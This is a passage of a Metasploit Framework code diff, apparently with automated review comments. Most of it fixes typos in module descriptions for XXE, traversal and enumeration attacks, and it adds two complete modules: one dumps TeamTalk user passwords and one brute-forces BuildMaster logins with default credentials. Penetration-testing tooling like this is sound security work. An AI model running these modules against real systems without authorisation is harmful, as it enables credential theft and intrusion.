CUSTOM_JS parameter and ensuring CLOSE_POPUP is set to false, this + module also allows running aribtrary javascript in the context of the targeted URL. Some sample UXSS scripts are provided in data/exploits/uxss. }, 'Author' => [ diff --git a/modules/auxiliary/gather/asterisk_creds.rb b/modules/auxiliary/gather/asterisk_creds.rb index 1604031ea9..b1602a5133 100644 --- a/modules/auxiliary/gather/asterisk_creds.rb +++ b/modules/auxiliary/gather/asterisk_creds.rb @@ -116,7 +116,6 @@ class MetasploitModule < Msf::Auxiliary }.merge service_data login_data = { - last_attempted_at: DateTime.now, core: create_credential(credential_data), status: Metasploit::Model::Login::Status::UNTRIED, proof: opts[:proof] diff --git a/modules/auxiliary/gather/corpwatch_lookup_name.rb b/modules/auxiliary/gather/corpwatch_lookup_name.rb index c950966ffe..9eeff32ca5 100644 --- a/modules/auxiliary/gather/corpwatch_lookup_name.rb 
+++ b/modules/auxiliary/gather/corpwatch_lookup_name.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ This module interfaces with the CorpWatch API to get publicly available info for a given company name. Please note that by using CorpWatch API, you - acknolwdge the limitations of the data CorpWatch provides, and should always + acknowledge the limitations of the data CorpWatch provides, and should always verify the information with the official SEC filings before taking any action. }, 'Author' => [ 'Brandon Perry ' ], diff --git a/modules/auxiliary/gather/eaton_nsm_creds.rb b/modules/auxiliary/gather/eaton_nsm_creds.rb index 5cfd9bea39..3c5669d19f 100644 --- a/modules/auxiliary/gather/eaton_nsm_creds.rb +++ b/modules/auxiliary/gather/eaton_nsm_creds.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary This module will extract user credentials from Network Shutdown Module versions 3.21 and earlier by exploiting a vulnerability found in lib/dbtools.inc, which uses unsanitized user input inside a eval() call. - Please note that in order to extract credentials,the vulnerable service + Please note that in order to extract credentials, the vulnerable service must have at least one USV module (an entry in the "nodes" table in mgedb.db). }, diff --git a/modules/auxiliary/gather/emc_cta_xxe.rb b/modules/auxiliary/gather/emc_cta_xxe.rb index 50db85b880..e34a632f26 100644 --- a/modules/auxiliary/gather/emc_cta_xxe.rb +++ b/modules/auxiliary/gather/emc_cta_xxe.rb @@ -30,10 +30,10 @@ class MetasploitModule < Msf::Auxiliary [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), - OptString.new('SSLVersion', [true, 'SSL version', 'TLS1']), OptString.new('TARGETURI', [ true, "Base directory path", '/']), OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]), - ]) + ] + ) end def run 
diff --git a/modules/auxiliary/gather/impersonate_ssl.rb b/modules/auxiliary/gather/impersonate_ssl.rb index fa32366b98..87985c1d38 100644 --- a/modules/auxiliary/gather/impersonate_ssl.rb +++ b/modules/auxiliary/gather/impersonate_ssl.rb @@ -21,7 +21,7 @@ class MetasploitModule < Msf::Auxiliary (self.signed) version using the information from the remote version. The module then Outputs (PEM|DER) format private key / certificate and a combined version for use in Apache or other Metasploit modules requiring SSLCert Inputs for private - key / CA cert have been provided for those with diginator certs hanging about! + key / CA cert have been provided for those with DigiNotar certs hanging about! } )) diff --git a/modules/auxiliary/gather/kerberos_enumusers.rb b/modules/auxiliary/gather/kerberos_enumusers.rb index c1c0a4edd8..e67bdea8c3 100644 --- a/modules/auxiliary/gather/kerberos_enumusers.rb +++ b/modules/auxiliary/gather/kerberos_enumusers.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Kerberos Domain User Enumeration', 'Description' => %q( - This module will enumerate valid Domain Users via Kerberos from an unauthenticated perspective. It utilises + This module will enumerate valid Domain Users via Kerberos from an unauthenticated perspective. It utilizes the different responses returned by the service for valid and invalid users. ), 'Author' => diff --git a/modules/auxiliary/gather/shodan_search.rb b/modules/auxiliary/gather/shodan_search.rb index 0fac424f52..5ff04d17d4 100644 --- a/modules/auxiliary/gather/shodan_search.rb +++ b/modules/auxiliary/gather/shodan_search.rb 
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'Shodan Search', 'Description' => %q{ This module uses the Shodan API to search Shodan. Accounts are free - and an API key is required to used this module. Output from the module + and an API key is required to use this module. Output from the module is displayed to the screen and can be saved to a file or the MSF database. NOTE: SHODAN filters (i.e. port, hostname, os, geo, city) can be used in queries, but there are limitations when used with a free API key. Please diff --git a/modules/auxiliary/gather/teamtalk_creds.rb b/modules/auxiliary/gather/teamtalk_creds.rb new file mode 100644 index 0000000000..44e12fb942 --- /dev/null +++ b/modules/auxiliary/gather/teamtalk_creds.rb 
@@ -0,0 +1,177 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Auxiliary::Report
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'TeamTalk Gather Credentials',
+ 'Description' => %q{
+ This module retrieves user credentials from BearWare TeamTalk.
+
+ Valid administrator credentials are required.
+
+ This module has been tested successfully on TeamTalk versions
+ 5.2.2.4885 and 5.2.3.4893.
+ },
+ 'Author' => 'Brendan Coles ',
+ 'References' =>
+ [
+ # Protocol documentation
+ ['URL', 'https://github.com/BearWare/TeamTalk5/blob/master/ttphpadmin/tt5admin.php']
+ ],
+ 'License' => MSF_LICENSE))
+ register_options [
+ Opt::RPORT(10333),
+ OptString.new('USERNAME', [false, 'The username for TeamTalk', 'admin']),
+ OptString.new('PASSWORD', [false, 'The password for the specified username', 'admin'])
+ ]
+ end
+
+ def run
+ vprint_status 'Connecting...'
+
+ connect
+ banner = sock.get_once
+
+ unless banner =~ /^teamtalk\s.*protocol="([\d\.]+)"/
+ fail_with Failure::BadConfig, 'TeamTalk does not appear to be running'
+ end
+
+ print_status "Found TeamTalk (protocol version #{$1})"
+
+ report_service :host => rhost,
+ :port => rport,
+ :proto => 'tcp',
+ :name => 'teamtalk'
+
+ vprint_status "Authenticating as '#{username}'"
+
+ req = "login username=\"#{username.tr('"', '\"')}\" password=\"#{password.tr('"', '\"')}\""
+ res = send_command req
+
+ unless res.to_s.starts_with? 'accepted'
+ fail_with Failure::NoAccess, 'Authentication failed'
+ end
+
+ print_good 'Authenticated successfully'
+
+ if res =~ /usertype=2/
+ print_good 'User is an administrator'
+ else
+ print_warning 'User is not an administrator'
+ end
+
+ vprint_status "Retrieving users..."
+
+ res = send_command 'listaccounts'
+
+ if res =~ /^error/ && res =~ /message="Command not authorized"/
+ print_error 'Insufficient privileges'
+ return
+ end
+
+ unless res =~ /^ok\r?\n?\z/
+ print_error 'Unexpected reply'
+ return
+ end
+
+ cred_table = Rex::Text::Table.new 'Header' => 'TeamTalk User Credentials',
+ 'Indent' => 1,
+ 'Columns' => ['Username', 'Password', 'Type']
+
+ res.each_line do |line|
+ line.chomp!
+ next unless line =~ /^useraccount/
+
+ user = line.scan(/\s+username="(.*?)"\s+password=/).flatten.first.to_s.gsub('\"', '"')
+ pass = line.scan(/\s+password="(.*?)"\s+usertype=/).flatten.first.to_s.gsub('\"', '"')
+ type = line.scan(/\s+usertype=(\d+)\s+/).flatten.first
+
+ cred_table << [ user, pass, type ]
+ report_cred user: user,
+ password: pass,
+ type: type,
+ proof: line
+ end
+
+ if cred_table.rows.empty?
+ print_error 'Did not find any users'
+ return
+ end
+
+ print_status "Found #{cred_table.rows.size} users"
+ print_line
+ print_line cred_table.to_s
+
+ p = store_loot 'teamtalk.user.creds',
+ 'text/csv',
+ rhost,
+ cred_table.to_csv,
+ 'TeamTalk User Credentials'
+
+ print_good "Credentials saved in: #{p}"
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
+ print_error e.message
+ ensure
+ disconnect
+ end
+
+ private
+
+ def username
+ datastore['USERNAME'] || ''
+ end
+
+ def password
+ datastore['PASSWORD'] || ''
+ end
+
+ def report_cred(opts)
+ service_data = {
+ address: rhost,
+ port: rport,
+ service_name: 'teamtalk',
+ protocol: 'tcp',
+ workspace_id: myworkspace_id
+ }
+
+ credential_data = {
+ origin_type: :service,
+ module_fullname: fullname,
+ username: opts[:user],
+ private_data: opts[:password],
+ private_type: :password
+ }.merge service_data
+
+ login_data = {
+ core: create_credential(credential_data),
+ status: Metasploit::Model::Login::Status::UNTRIED,
+ access_level: opts[:type],
+ proof: opts[:proof]
+ }.merge service_data
+
+ create_credential_login login_data
+ end
+
+ def send_command(cmd = '')
+ cmd_id = rand(1000)
+ sock.put "#{cmd} id=#{cmd_id}\n"
+
+ res = ''
+ timeout = 15
+ Timeout.timeout(timeout) do
+ res << sock.get_once until res =~ /^end id=#{cmd_id}/
+ end
+
+ res.to_s.scan(/begin id=#{cmd_id}\r?\n(.*)\r?\nend id=#{cmd_id}/m).flatten.first
+ rescue Timeout::Error
+ print_error "Timeout (#{timeout} seconds)"
+ rescue => e
+ print_error e.message
+ end
+end
diff --git a/modules/auxiliary/gather/windows_deployment_services_shares.rb b/modules/auxiliary/gather/windows_deployment_services_shares.rb
index f2c1734fa4..21b2c3a274 100644
--- a/modules/auxiliary/gather/windows_deployment_services_shares.rb
+++ b/modules/auxiliary/gather/windows_deployment_services_shares.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary
 'Description' => %q{
 This module will search remote file shares for unattended installation files that may contain domain credentials. This is often used after discovering domain credentials with the
- auxilliary/scanner/dcerpc/windows_deployment_services module or in cases where you already
+ auxiliary/scanner/dcerpc/windows_deployment_services module or in cases where you already
 have domain credentials. This module will connect to the RemInst share and any Microsoft Deployment Toolkit shares indicated by the share name comments.
 },
diff --git a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
index 44672f2485..841ba2f2d1 100644
--- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
+++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb
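Review bot: The quoting of the credentials in the `login` request in `run` is wrong: `username.tr('"', '\"')` is a character-for-character translation, so every `"` in the username or password becomes a single `\` instead of `\"`, which mangles any credential containing a quote and is the inverse of the `gsub('\"', '"')` used when parsing the `listaccounts` output. Use `username.gsub('"', '\"')` and `password.gsub('"', '\"')` (or one small `escape` helper shared by both) so the two directions agree. Both values are also interpolated straight into the protocol line, so a newline in either would be sent as a separate command; they are operator-supplied datastore values, but rejecting a value containing `\n` keeps the request well-formed. In `send_command`, `sock.get_once` returns nil once the peer closes the connection, so `res << sock.get_once` raises a TypeError that the bare `rescue => e` reports only as a message; breaking out of the loop when `get_once` returns nil would make a dropped connection distinguishable from a malformed reply.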
@@ -13,9 +13,9 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'WordPress W3-Total-Cache Plugin 0.9.2.4 (or before) Username and Hash Extract', 'Description' => "The W3-Total-Cache Wordpress Plugin <= 0.9.2.4 can cache database statements - and it's results in files for fast access. Version 0.9.2.4 has been fixed afterwards + and its results in files for fast access. Version 0.9.2.4 has been fixed afterwards so it can be vulnerable. These cache files are in the webroot of the Wordpress - installation and can be downloaded if the name is guessed. This modules tries to + installation and can be downloaded if the name is guessed. This module tries to locate them with brute force in order to find usernames and password hashes in these files. W3 Total Cache must be configured with Database Cache enabled and Database Cache Method set to Disk to be vulnerable", diff --git a/modules/auxiliary/pdf/foxit/authbypass.rb b/modules/auxiliary/pdf/foxit/authbypass.rb index a5cb22e12c..49c1f84458 100644 --- a/modules/auxiliary/pdf/foxit/authbypass.rb +++ b/modules/auxiliary/pdf/foxit/authbypass.rb @@ -12,9 +12,9 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Foxit Reader Authorization Bypass', 'Description' => %q{ - This module exploits a authorization bypass vulnerability in Foxit Reader - build 1120. When a attacker creates a specially crafted pdf file containing - a Open/Execute action, arbitrary commands can be executed without confirmation + This module exploits an authorization bypass vulnerability in Foxit Reader + build 1120. When an attacker creates a specially crafted pdf file containing + an Open/Execute action, arbitrary commands can be executed without confirmation from the victim. }, 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb index 8643171d35..cbf01588c4 100644 
--- a/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb +++ b/modules/auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ Send a spoofed router advertisement with high priority to force hosts to start the IPv6 address auto-config. Monitor for IPv6 host advertisements, - and try to guess the link-local address by concatinating the prefix, and + and try to guess the link-local address by concatenating the prefix, and the host portion of the IPv6 address. Use NDP host solicitation to determine if the IP address is valid' }, diff --git a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb index 184c32a4cd..e8c1d5fd67 100644 --- a/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb +++ b/modules/auxiliary/scanner/dlsw/dlsw_leak_capture.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q( This module implements the DLSw information disclosure retrieval. There is a bug in Cisco's DLSw implementation affecting 12.x and 15.x trains - that allows an unuthenticated remote attacker to retrieve the partial + that allows an unauthenticated remote attacker to retrieve the partial contents of packets traversing a Cisco router with DLSw configured and active. ), diff --git a/modules/auxiliary/scanner/dns/dns_amp.rb b/modules/auxiliary/scanner/dns/dns_amp.rb index c5709320ab..e72a43604b 100644 --- a/modules/auxiliary/scanner/dns/dns_amp.rb +++ b/modules/auxiliary/scanner/dns/dns_amp.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'DNS Amplification Scanner', 'Description' => %q{ This module can be used to discover DNS servers which expose recursive - name lookups which can be used in an amplication attack against a + name lookups which can be used in an amplification attack against a third party. }, 'Author' => [ 'xistence '], # Original scanner module 
diff --git a/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb b/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb index 8ee7ad3f65..475f27d38d 100644 --- a/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb +++ b/modules/auxiliary/scanner/ftp/colorado_ftp_traversal.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary This module exploits a directory traversal vulnerability found in ColoradoFTP server version <= 1.3 Build 8. This vulnerability allows an attacker to download and upload arbitrary files from the server GET/PUT command including file system traversal strings starting with '\\\'. - The server is writen in Java and therefore platform independant, however this vulnerability is only + The server is written in Java and therefore platform independent, however this vulnerability is only exploitable on the Windows version. }, 'Platform' => 'win', diff --git a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb index 6e52fec3e5..66a9876fb0 100644 --- a/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb +++ b/modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'Titan FTP XCRC Directory Traversal Information Disclosure', 'Description' => %q{ - This module exploits a directory traversal vulnreability in the XCRC command + This module exploits a directory traversal vulnerability in the XCRC command implemented in versions of Titan FTP up to and including 8.10.1125. By making sending multiple XCRC command, it is possible to disclose the contents of any file on the drive with a simple CRC "brute force" attack. diff --git a/modules/auxiliary/scanner/http/adobe_xml_inject.rb b/modules/auxiliary/scanner/http/adobe_xml_inject.rb index d7bfa95cc2..7b2273b2d1 100644 --- a/modules/auxiliary/scanner/http/adobe_xml_inject.rb +++ b/modules/auxiliary/scanner/http/adobe_xml_inject.rb 
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'Adobe XML External Entity Injection', 'Description' => %q{ - Multiple Adobe Products -- XML External Entity Injection. Affected Sofware: BlazeDS 3.2 and + Multiple Adobe Products -- XML External Entity Injection. Affected Software: BlazeDS 3.2 and earlier versions, LiveCycle 9.0, 8.2.1, and 8.0.1, LiveCycle Data Services 3.0, 2.6.1, and 2.5.1, Flex Data Services 2.0.1, ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2 }, diff --git a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb index b8cf0ee28a..6cdc9fa114 100644 --- a/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb +++ b/modules/auxiliary/scanner/http/barracuda_directory_traversal.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'Barracuda Multiple Product "locale" Directory Traversal', 'Description' => %q{ This module exploits a directory traversal vulnerability present in - serveral Barracuda products, including the Barracuda Spam and Virus Firewall, + several Barracuda products, including the Barracuda Spam and Virus Firewall, Barracuda SSL VPN, and the Barracuda Web Application Firewall. By default, this module will attempt to download the Barracuda configuration file. }, diff --git a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb index bd6de009d6..3d3f346c96 100644 --- a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb +++ b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb 
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'Bitweaver overlay_type Directory Traversal', 'Description' => %q{ This module exploits a directory traversal vulnerability found in Bitweaver. - When hanlding the 'overlay_type' parameter, view_overlay.php fails to do any + When handling the 'overlay_type' parameter, view_overlay.php fails to do any path checking/filtering, which can be abused to read any file outside the virtual directory. }, diff --git a/modules/auxiliary/scanner/http/buildmaster_login.rb b/modules/auxiliary/scanner/http/buildmaster_login.rb new file mode 100644 index 0000000000..b29d37dc1a --- /dev/null +++ b/modules/auxiliary/scanner/http/buildmaster_login.rb 
@@ -0,0 +1,96 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::AuthBrute
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Inedo BuildMaster Login Scanner',
+ 'Description' => %{
+ This module will attempt to authenticate to BuildMaster. There is a default user 'Admin'
+ which has the default password 'Admin'.
+ },
+ 'Author' => [ 'James Otten ' ],
+ 'License' => MSF_LICENSE,
+ 'DefaultOptions' => { 'VERBOSE' => true })
+ )
+
+ register_options(
+ [
+ Opt::RPORT(81),
+ OptString.new('USERNAME', [false, 'Username to authenticate as', 'Admin']),
+ OptString.new('PASSWORD', [false, 'Password to authenticate with', 'Admin'])
+ ]
+ )
+ end
+
+ def run_host(ip)
+ return unless buildmaster?
+
+ each_user_pass do |user, pass|
+ do_login(user, pass)
+ end
+ end
+
+ def buildmaster?
+ begin
+ res = send_request_cgi('uri' => '/log-in')
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+ print_error("#{peer} - HTTP Connection Failed")
+ return false
+ end
+
+ if res && res.code == 200 && res.body.include?('BuildMaster_Version')
+ version = res.body.scan(%r{(.*)}).flatten.first
+ print_good("#{peer} - Identified BuildMaster #{version}")
+ return true
+ else
+ print_error("#{peer} - Application does not appear to be BuildMaster")
+ return false
+ end
+ end
+
+ def login_succeeded?(res)
+ if res && res.code == 200
+ body = JSON.parse(res.body)
+ return body.key?('succeeded') && body['succeeded']
+ end
+ false
+ rescue
+ false
+ end
+
+ def do_login(user, pass)
+ print_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")
+ begin
+ res = send_request_cgi(
+ {
+ 'uri' => '/0x44/BuildMaster.Web.WebApplication/Inedo.BuildMaster.Web.WebApplication.Pages.LogInPage/LogIn',
+ 'method' => 'POST',
+ 'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
+ 'vars_post' =>
+ {
+ 'userName' => user,
+ 'password' => pass
+ }
+ }
+ )
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+ vprint_error("#{peer} - HTTP Connection Failed...")
+ return :abort
+ end
+
+ if login_succeeded?(res)
+ print_good("SUCCESSFUL LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}")
+ store_valid_credential(user: user, private: pass)
+ else
+ print_error("FAILED LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}")
+ end
+ end
+end
diff --git a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb
index c2431705d5..25b4201b83 100644
--- a/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb
+++ b/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb
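Review bot: `do_login` keeps going after a hit: on a successful login it stores the credential and then falls through, so `each_user_pass` continues trying the remaining passwords for that user; returning `:next_user` after `store_valid_credential(user: user, private: pass)`, the way the connection-failure branch already returns `:abort`, avoids those extra requests. The version extraction in `buildmaster?`, `res.body.scan(%r{(.*)})`, as rendered here would capture the whole body rather than the version; if the pattern lost its HTML tags in rendering, ignore this, otherwise anchor it on the element that carries `BuildMaster_Version`. The two connection-failure branches also differ in verbosity (`print_error` in `buildmaster?`, `vprint_error` in `do_login`) and wording; pick one. The bare `rescue` in `login_succeeded?` is a reasonable guard against a non-JSON body, but it also turns any other error into a silent failed login; rescuing `JSON::ParserError` specifically keeps unexpected problems visible.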
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary This module attempts to authenticate to different D-Link HTTP management services. It has been tested successfully on D-Link DIR-300 Hardware revision B, D-Link DIR-600 Hardware revision B, D-Link DIR-815 Hardware revision A and DIR-645 - Hardware revision A devices.It is possible that this module also works with other + Hardware revision A devices. It is possible that this module also works with other models. }, 'Author' => diff --git a/modules/auxiliary/scanner/http/error_sql_injection.rb b/modules/auxiliary/scanner/http/error_sql_injection.rb index 204285d319..dc6e5b270f 100644 --- a/modules/auxiliary/scanner/http/error_sql_injection.rb +++ b/modules/auxiliary/scanner/http/error_sql_injection.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'HTTP Error Based SQL Injection Scanner', 'Description' => %q{ - This module identifies the existence of Error Based SQL injection issues. Still requires alot of work + This module identifies the existence of Error Based SQL injection issues. Still requires a lot of work }, 'Author' => [ 'et [at] cyberspace.org' ], diff --git a/modules/auxiliary/scanner/http/file_same_name_dir.rb b/modules/auxiliary/scanner/http/file_same_name_dir.rb index 48c2b4a183..4929f9c3e2 100644 --- a/modules/auxiliary/scanner/http/file_same_name_dir.rb +++ b/modules/auxiliary/scanner/http/file_same_name_dir.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Auxiliary in a given directory path named as the same name of the directory. - Only works if PATH is differenet than '/'. + Only works if PATH is different than '/'. }, 'Author' => [ 'et [at] metasploit.com' ], 'License' => BSD_LICENSE)) diff --git a/modules/auxiliary/scanner/http/iis_internal_ip.rb b/modules/auxiliary/scanner/http/iis_internal_ip.rb index b22dfbd4a8..2114670eb1 100644 --- a/modules/auxiliary/scanner/http/iis_internal_ip.rb +++ b/modules/auxiliary/scanner/http/iis_internal_ip.rb 
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Microsoft IIS HTTP Internal IP Disclosure', 'Description' => %q{ - Collect any leaked internal IPs by requesting commonly redirected locs from IIS. + Collect any leaked internal IPs by requesting commonly redirected locations from IIS. }, 'Author' => ['Heather Pilkington'], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb b/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb index 8cb61b3d6a..737fdd3306 100644 --- a/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb +++ b/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ This module scans for Intel Active Management Technology endpoints and attempts to bypass authentication using a blank HTTP digest (CVE-2017-5689). This service - can be found on ports 16992, 16993 (tls), 623, and 624(tls). + can be found on ports 16992, 16993 (tls), 623, and 624 (tls). }, 'Author' => 'hdm', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/http/jboss_vulnscan.rb b/modules/auxiliary/scanner/http/jboss_vulnscan.rb index ddfc715340..924830721d 100644 --- a/modules/auxiliary/scanner/http/jboss_vulnscan.rb +++ b/modules/auxiliary/scanner/http/jboss_vulnscan.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'JBoss Vulnerability Scanner', 'Description' => %q( - This module scans a JBoss instance for a few vulnerablities. + This module scans a JBoss instance for a few vulnerabilities. ), 'Author' => [ diff --git a/modules/auxiliary/scanner/http/jenkins_enum.rb b/modules/auxiliary/scanner/http/jenkins_enum.rb index faf3a7282c..953c0ca9c6 100644 --- a/modules/auxiliary/scanner/http/jenkins_enum.rb +++ b/modules/auxiliary/scanner/http/jenkins_enum.rb 
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'Jenkins-CI Enumeration', 'Description' => %q{ This module enumerates a remote Jenkins-CI installation in an unauthenticated manner, including - host operating system and and Jenkins installation details. + host operating system and Jenkins installation details. }, 'Author' => 'Jeff McCutchan', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/http/lucky_punch.rb b/modules/auxiliary/scanner/http/lucky_punch.rb index 71ad64061d..a7d15f28e0 100644 --- a/modules/auxiliary/scanner/http/lucky_punch.rb +++ b/modules/auxiliary/scanner/http/lucky_punch.rb @@ -16,8 +16,8 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'HTTP Microsoft SQL Injection Table XSS Infection', 'Description' => %q{ This module implements the mass SQL injection attack in - use lately by concatenation of HTML string that forces a persistant - XSS attack to redirect user browser to a attacker controller website. + use lately by concatenation of HTML string that forces a persistent + XSS attack to redirect user browser to an attacker controller website. }, 'Author' => [ 'et' ], 'License' => BSD_LICENSE)) diff --git a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb index 5d61375a5e..8ff136cba6 100644 --- a/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb +++ b/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb 
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary This module makes requests to resources on the target server in an attempt to find resources which permit NTLM authentication. For resources which permit NTLM authentication, a blank NTLM type 1 message - is sent to enumerate a a type 2 message from the target server. The type + is sent to enumerate a type 2 message from the target server. The type 2 message is then parsed for information such as the Active Directory domain and NetBIOS name. A single URI can be specified with TARGET_URI and/or a file of URIs can be specified with TARGET_URIS_FILE (default). diff --git a/modules/auxiliary/scanner/http/octopusdeploy_login.rb b/modules/auxiliary/scanner/http/octopusdeploy_login.rb index c8c392d2a9..17138235ad 100644 --- a/modules/auxiliary/scanner/http/octopusdeploy_login.rb +++ b/modules/auxiliary/scanner/http/octopusdeploy_login.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'Octopus Deploy Login Utility', 'Description' => %q{ - This module simply attempts to login to a Octopus Deploy server using a specific + This module simply attempts to login to an Octopus Deploy server using a specific username and password. It has been confirmed to work on version 3.4.4 }, 'Author' => [ 'James Otten ' ], diff --git a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb index b043f1b50a..c0f199ecaa 100644 --- a/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb +++ b/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ This module exploits a file download vulnerability found in Oracle Demantra 12.2.1 in combination with an authentication bypass. By - combining these exposures, an unauthenticated user can retreive any file + combining these exposures, an unauthenticated user can retrieve any file on the system by referencing the full file path to any file a vulnerable machine. }, diff --git a/modules/auxiliary/scanner/http/rails_mass_assignment.rb b/modules/auxiliary/scanner/http/rails_mass_assignment.rb index 9e1b483c32..02a377dfae 100644 --- a/modules/auxiliary/scanner/http/rails_mass_assignment.rb +++ b/modules/auxiliary/scanner/http/rails_mass_assignment.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Auxiliary models with attributes not protected by attr_protected or attr_accessible. After attempting to assign a non-existent field, the default rails with active_record setup will raise an ActiveRecord::UnknownAttributeError - exeption, and reply with HTTP code 500. + exception, and reply with HTTP code 500. }, 'References' => diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb index 3439661d9b..51b4bcae2c 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'SAP BusinessObjects User Enumeration', 'Description' => %Q{ This module simply attempts to enumerate SAP BusinessObjects - users.The dswsbobje interface is only used to verify valid + users. The dswsbobje interface is only used to verify valid users for CmcApp. Therefore, any valid users that have been identified can be leveraged by logging into CmcApp. }, diff --git a/modules/auxiliary/scanner/http/scraper.rb b/modules/auxiliary/scanner/http/scraper.rb index 